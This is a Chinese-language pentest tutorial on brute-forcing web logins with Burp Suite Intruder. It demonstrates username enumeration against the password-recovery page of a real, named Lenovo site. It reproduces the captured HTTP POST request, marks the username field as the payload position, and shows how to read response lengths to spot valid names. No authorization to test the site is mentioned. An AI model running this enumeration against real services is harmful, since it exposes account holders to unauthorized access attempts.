接下来,单独讲一下暴力破解,这个在渗透测试的时候,也是非常重要的入侵手段。
在此,我只讲一下关于web方面的暴力破解,其他如:主机,防火墙,数据库等等的暴力破解,就不讲了,大家可以自行百度,自行学习,一定得养成独立自学的习惯,遇到问题,再去解决,即,带着疑问去找答案,而不是填鸭式的学一些东西,其实,这算是王爽老师的话,分享给大家。
burpsuite-intruder介绍
大家可以自学我一位朋友的关于burpsuite的系列教程,百度:angelc0de,你就会找到他。
burpsuite-Intruder:一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。
虽然说的比较复杂,但是,我们只学习他的暴力破解功能,其他不管。
例1, 联想prccn站取回密码处,暴力猜解该站用户名,如图:
猜解前提:
1、 无验证码或者验证码可绕过
2、 未限制错误次数
恰好,这里同时满足这两个条件。
输入用户名:1111111
使用burpsuite截获请求包
POST /ReturnPassword.aspx HTTP/1.1
Host: prccn.lenovo.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=1111111&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81
接着,Ctrl+i,将该intercept下面的数据包复制到intruder下面,如图:
此时,intruder下就有与intercept下同样的一份数据包了
现在,我们来clear掉所有褐色,然后,使用add将该txtUserName=1111111键值对标上助记符,最后,加载wordlist字典让intruder来为我们进行暴力猜解该用户名。
如图所示:
POST /ReturnPassword.aspx HTTP/1.1
Host: prccn.lenovo.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=§1111111§&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81
看到了吗,我们要猜解的用户名1111111,已经被$助记符标记上了。
接下来,加载我们的worldlist用户名字典,如图:
Playloads标签下面,选择Playload type,选择Runtime file,选择Select file,最后,选择我们的worldlist用户名字典
字典加载完成后,在菜单栏找到intruder标签,选择Start attack,intruder就开始为我们暴力猜解了。
如图所示:
几分钟后,intruder猜解完成
嘿嘿,看下Length字段,是否有别具一格的数据包长度。
Length=2482(目测是猜解成功的用户名)
试试呗,输入:aaa
看来不是,继续查看其他长度的数据包
输入:alex试试
还是错误,算了,不试了,其实,还有更精确的查找法,可以看看angelc0de的系列教程,在此,不再赘述。